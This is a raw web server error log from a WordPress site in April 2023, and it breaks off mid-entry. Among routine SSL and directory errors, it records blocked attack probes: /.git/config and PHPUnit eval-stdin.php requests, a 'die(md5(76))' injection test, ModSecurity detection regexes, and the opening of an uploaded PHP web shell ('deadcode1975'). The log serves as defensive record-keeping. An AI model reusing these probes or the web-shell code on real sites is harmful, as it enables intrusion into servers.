(index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sun Apr 02 07:34:31.968253 2023] [:error] [pid 26337:tid 140553634264832] [client 20.121.50.90:51160] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentynineteen/404.php:12 [Sun Apr 02 07:34:31.968320 2023] [:error] [pid 26337:tid 140553634264832] [client 20.121.50.90:51160] Stack trace: [Sun Apr 02 07:34:31.968330 2023] [:error] [pid 26337:tid 140553634264832] [client 20.121.50.90:51160] #0 {main} [Sun Apr 02 07:34:31.968399 2023] [:error] [pid 26337:tid 140553634264832] [client 20.121.50.90:51160] thrown in /home/investig/public_html/wp-content/themes/twentynineteen/404.php on line 12 [Sun Apr 02 07:34:32.499046 2023] [:error] [pid 26337:tid 140553509385984] [client 20.121.50.90:51162] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/investig/public_html/wp-content/themes/twentyfifteen/404.php:10 [Sun Apr 02 07:34:32.499113 2023] [:error] [pid 26337:tid 140553509385984] [client 20.121.50.90:51162] Stack trace: [Sun Apr 02 07:34:32.499123 2023] [:error] [pid 26337:tid 140553509385984] [client 20.121.50.90:51162] #0 {main} [Sun Apr 02 07:34:32.499190 2023] [:error] [pid 26337:tid 140553509385984] [client 20.121.50.90:51162] thrown in /home/investig/public_html/wp-content/themes/twentyfifteen/404.php on line 10 [Mon Apr 03 03:40:21.999131 2023] [ssl:warn] [pid 18298:tid 140294522312576] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Apr 03 03:40:22.128976 2023] [ssl:warn] [pid 18299:tid 140294522312576] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Apr 03 03:40:22.590288 2023] [ssl:warn] [pid 18299:tid 140294522312576] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Apr 03 03:40:24.191052 2023] [ssl:warn] [pid 18299:tid 140294522312576] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Apr 03 03:40:26.433577 2023] [ssl:warn] [pid 18714:tid 140582210234240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Apr 03 03:40:26.566486 2023] [ssl:warn] [pid 18715:tid 140582210234240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2023/04/03 04:50:53 [crit] 18696#18696: *759781 SSL_do_handshake() failed (SSL: error:14094085:SSL routines:ssl3_read_bytes:ccs received early) while SSL handshaking, client: 181.67.43.160, server: 198.199.72.26:443 2023/04/03 04:50:56 [crit] 18696#18696: *759784 SSL_do_handshake() failed (SSL: error:14094085:SSL routines:ssl3_read_bytes:ccs received early) while SSL handshaking, client: 181.67.43.160, server: 198.199.72.26:443 [Mon Apr 03 13:10:24.760024 2023] [ssl:warn] [pid 18715:tid 140582210234240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Apr 03 13:10:38.463319 2023] [ssl:warn] [pid 18715:tid 140582210234240] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Apr 03 13:31:00.389577 2023] [autoindex:error] [pid 1652:tid 140581888042752] [client 194.169.175.92:48412] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Apr 03 13:33:09.918876 2023] [autoindex:error] [pid 1748:tid 140581829293824] [client 194.169.175.92:48596] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Apr 03 14:08:13.978814 2023] [:error] [pid 1652:tid 140581787330304] [client 162.144.85.198:50198] [client 162.144.85.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:X-Dns-Prefetch-Control. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:X-Dns-Prefetch-Control: die(md5(76));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/index.php"] [unique_id "ZCskHUUVxnQIWHKBoZ3jrgAAAFQ"] [Tue Apr 04 03:15:27.620453 2023] [ssl:warn] [pid 27912:tid 140308589139840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Apr 04 03:15:27.741534 2023] [ssl:warn] [pid 27915:tid 140308589139840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Apr 04 03:15:28.067334 2023] [ssl:warn] [pid 27915:tid 140308589139840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Apr 04 03:15:29.953706 2023] [ssl:warn] [pid 27915:tid 140308589139840] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Apr 04 03:15:32.313986 2023] [ssl:warn] [pid 28359:tid 140615089825664] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Apr 04 03:15:32.428802 2023] [ssl:warn] [pid 28360:tid 140615089825664] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Apr 04 06:42:27.045221 2023] [autoindex:error] [pid 28671:tid 140614721029888] [client 194.169.175.92:42312] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Apr 04 06:44:58.699949 2023] [autoindex:error] [pid 28671:tid 140614771386112] [client 194.169.175.92:42470] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Apr 05 01:42:41.198944 2023] [autoindex:error] [pid 28383:tid 140614687459072] [client 93.90.200.43:42804] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Apr 05 02:17:33.729862 2023] [autoindex:error] [pid 28384:tid 140614909204224] [client 93.90.200.43:44572] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Apr 05 03:14:23.754414 2023] [ssl:warn] [pid 4994:tid 140624278415232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Apr 05 03:14:23.874183 2023] [ssl:warn] [pid 4995:tid 140624278415232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Apr 05 03:14:24.094426 2023] [ssl:warn] [pid 4995:tid 140624278415232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Apr 05 03:14:26.258088 2023] [ssl:warn] [pid 4995:tid 140624278415232] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Apr 05 03:14:28.547922 2023] [ssl:warn] [pid 5441:tid 140654914295680] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Apr 05 03:14:28.673774 2023] [ssl:warn] [pid 5442:tid 140654914295680] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Apr 05 03:14:29.301727 2023] [ssl:warn] [pid 5442:tid 140654914295680] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Apr 05 16:27:01.593214 2023] [autoindex:error] [pid 10352:tid 140654499800832] [client 20.172.235.222:39730] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Apr 05 19:30:00.622377 2023] [autoindex:error] [pid 6028:tid 140654700103424] [client 4.234.130.68:47442] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Apr 06 03:28:24.441740 2023] [ssl:warn] [pid 23734:tid 140623777576832] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Apr 06 03:28:24.563652 2023] [ssl:warn] [pid 23735:tid 140623777576832] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Apr 06 03:28:25.040898 2023] [ssl:warn] [pid 23735:tid 140623777576832] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Apr 06 03:28:27.270759 2023] [ssl:warn] [pid 23735:tid 140623777576832] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Apr 06 03:28:29.518183 2023] [ssl:warn] [pid 24211:tid 140016473347968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Apr 06 03:28:29.630173 2023] [ssl:warn] [pid 24212:tid 140016473347968] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Apr 06 04:06:45.714449 2023] [autoindex:error] [pid 24666:tid 140016168711936] [client 20.122.10.105:44404] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Apr 06 14:10:44.342124 2023] [autoindex:error] [pid 24234:tid 140016185497344] [client 172.174.8.60:43048] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Apr 06 14:47:49.368397 2023] [autoindex:error] [pid 24232:tid 140016160319232] [client 170.106.176.34:45168] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2023/04/07 03:24:33 [error] 24164#24164: *975953 access forbidden by rule, client: 199.195.253.105, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Fri Apr 07 03:50:22.143397 2023] [ssl:warn] [pid 27737:tid 140143368796032] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Apr 07 03:50:22.268564 2023] [ssl:warn] [pid 27738:tid 140143368796032] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Apr 07 03:50:22.638236 2023] [ssl:warn] [pid 27738:tid 140143368796032] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Apr 07 03:50:24.552550 2023] [ssl:warn] [pid 27738:tid 140143368796032] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Apr 07 03:50:26.853009 2023] [ssl:warn] [pid 28183:tid 139879124670336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Apr 07 03:50:26.971670 2023] [ssl:warn] [pid 28184:tid 139879124670336] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2023/04/07 22:13:47 [error] 28136#28136: *1018311 access forbidden by rule, client: 185.246.188.73, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/04/07 22:13:48 [error] 28136#28136: *1018313 access forbidden by rule, client: 109.69.67.17, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" [Fri Apr 07 22:18:19.805348 2023] [autoindex:error] [pid 28423:tid 139878771689216] [client 20.172.235.222:49472] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2023/04/08 00:43:14 [error] 28136#28136: *1023384 access forbidden by rule, client: 74.207.237.46, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/04/08 00:43:14 [error] 28136#28136: *1023493 access forbidden by rule, client: 139.59.138.49, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2023/04/08 00:43:14 [error] 28136#28136: *1023481 access forbidden by rule, client: 198.199.121.22, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/04/08 00:43:14 [error] 28136#28136: *1023534 access forbidden by rule, client: 167.172.232.142, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Apr 08 00:43:14.772223 2023] [authz_core:error] [pid 28206:tid 139878721332992] [client 167.172.232.142:55758] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/04/08 00:43:15 [error] 28136#28136: *1023584 access forbidden by rule, client: 161.35.176.95, server: mail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "mail.investigacionperu.com" 2023/04/08 00:43:16 [error] 28135#28135: *1023649 access forbidden by rule, client: 52.58.25.43, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" 2023/04/08 00:43:17 [error] 28136#28136: *1023676 access forbidden by rule, client: 167.99.184.41, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Apr 08 00:43:17.809004 2023] [authz_core:error] [pid 28206:tid 139878712940288] [client 167.99.184.41:55886] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/04/08 00:43:17 [error] 28136#28136: *1023700 access forbidden by rule, client: 104.248.140.11, server: webmail.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "webmail.investigacionperu.com" 2023/04/08 00:43:18 [error] 28136#28136: *1023713 access forbidden by rule, client: 164.90.205.35, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2023/04/08 00:43:19 [error] 28135#28135: *1023776 access forbidden by rule, client: 167.99.182.39, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Apr 08 00:43:19.858169 2023] [authz_core:error] [pid 28205:tid 139878822045440] [client 167.99.182.39:55968] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2023/04/08 00:43:21 [error] 28135#28135: *1023809 access forbidden by rule, client: 139.59.182.142, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Apr 08 00:43:21.521027 2023] [authz_core:error] [pid 28205:tid 139878780081920] [client 139.59.182.142:55998] AH01630: client denied by server configuration: /home/investig/public_html/server-status [Sat Apr 08 07:30:34.619327 2023] [autoindex:error] [pid 8949:tid 139982782035712] [client 170.106.176.34:46292] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Sat Apr 08 18:05:38.195293 2023] [autoindex:error] [pid 9572:tid 139982698108672] [client 20.163.30.104:45444] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Apr 10 15:02:21.214863 2023] [autoindex:error] [pid 15271:tid 140062893266688] [client 20.26.233.84:49228] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Mon Apr 10 15:43:46.347536 2023] [:error] [pid 15271:tid 140062901659392] [client 82.165.244.48:51050] [client 82.165.244.48] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "text/plain"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/stylec.php"] [unique_id "ZDR1Am_DKUj0AZvCV2t00gAAAMU"], referer: www.google.com [Mon Apr 10 15:43:48.778947 2023] [:error] [pid 15271:tid 140062742198016] [client 82.165.244.48:51058] [client 82.165.244.48] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "text/plain"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/index.php"] [unique_id "ZDR1BG_DKUj0AZvCV2t01AAAANg"], referer: www.google.com [Mon Apr 10 15:43:51.180580 2023] [:error] [pid 15271:tid 140062851303168] [client 82.165.244.48:51062] [client 82.165.244.48] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "text/plain"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/stylec.php"] [unique_id "ZDR1B2_DKUj0AZvCV2t01QAAAMs"], referer: www.google.com [Mon Apr 10 15:43:52.837528 2023] [:error] [pid 15271:tid 140062817732352] [client 82.165.244.48:51064] [client 82.165.244.48] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^%{tx.allowed_request_content_type}$" against "TX:0" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "64"] [id "960010"] [rev "2"] [msg "Request content type is not allowed by policy"] [data "text/plain"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/ENCODING_NOT_ALLOWED"] [tag "WASCTC/WASC-20"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/EE2"] [tag "PCI/12.1"] [hostname "investigacionperu.com"] [uri "/index.php"] [unique_id "ZDR1CG_DKUj0AZvCV2t01gAAAM8"], referer: www.google.com [Mon Apr 10 15:45:39.233792 2023] [autoindex:error] [pid 15271:tid 140062758983424] [client 204.48.26.148:51164] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Mon Apr 10 20:20:49.579263 2023] [autoindex:error] [pid 14647:tid 140062868088576] [client 20.119.96.179:34718] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Wed Apr 12 07:44:28.452968 2023] [:error] [pid 819:tid 140296029460224] [client 178.159.37.41:34016] [client 178.159.37.41] ModSecurity: Access denied with code 403 (phase 1). Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "280"] [id "960011"] [rev "1"] [msg "GET or HEAD Request with Body Content."] [data "508"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/indeed-membership-pro/classes/PaymentGateways/mollie/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZDanrDStyDxRxiAP6QwKeAAAAMY"] [Wed Apr 12 08:01:08.381892 2023] [:error] [pid 819:tid 140296012674816] [client 212.227.45.113:34752] [client 212.227.45.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:submit. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: >> found within ARGS:submit: >>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZDarlDStyDxRxiAP6QwK9AAAAMg"], referer: www.google.com 2023/04/13 18:22:23 [error] 4515#4515: *1316011 access forbidden by rule, client: 43.231.232.166, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Apr 13 19:16:31.299265 2023] [autoindex:error] [pid 4665:tid 140257832904448] [client 95.216.148.85:52308] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Apr 14 14:42:17.667969 2023] [:error] [pid 7613:tid 140013173925632] [client 139.59.77.216:59600] [client 139.59.77.216] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:X-Dns-Prefetch-Control. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:X-Dns-Prefetch-Control: die(md5(76));"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/index.php"] [unique_id "ZDmsmfyv-59NXBuqOe8X6wAAAFM"] [Sat Apr 15 03:27:55.534274 2023] [:error] [pid 17479:tid 140542147524352] [client 20.219.2.242:42526] [client 20.219.2.242] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:sfilecontent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "136"] [id "950911"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <html found within ARGS:sfilecontent: <html>\\x0a<title> deadcode1975 </title>\\x0a<center>\\x0a\\x09<h1> deadcode1975 </h1>\\x0a<?php echo '<b>system info:</b> '.php_uname().'<br>'.'<b>current directory:</b> '.getcwd();echo '<br><form method=\\x22post\\x22 enctype=\\x22multipart/form-data\\x22 name=\\x22uploader\\x22 id=\\x22uploader\\x22><input type=\\x22file\\x22 name=\\x22file\\x22 size=\\x2220\\x22><input name=\\x22_upl\\x22 type=\\x22submit\\x22 id=\\x22_upl\\x22 value=\\x22uploaded\\x22></form></td></tr></tabl..."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [hostname 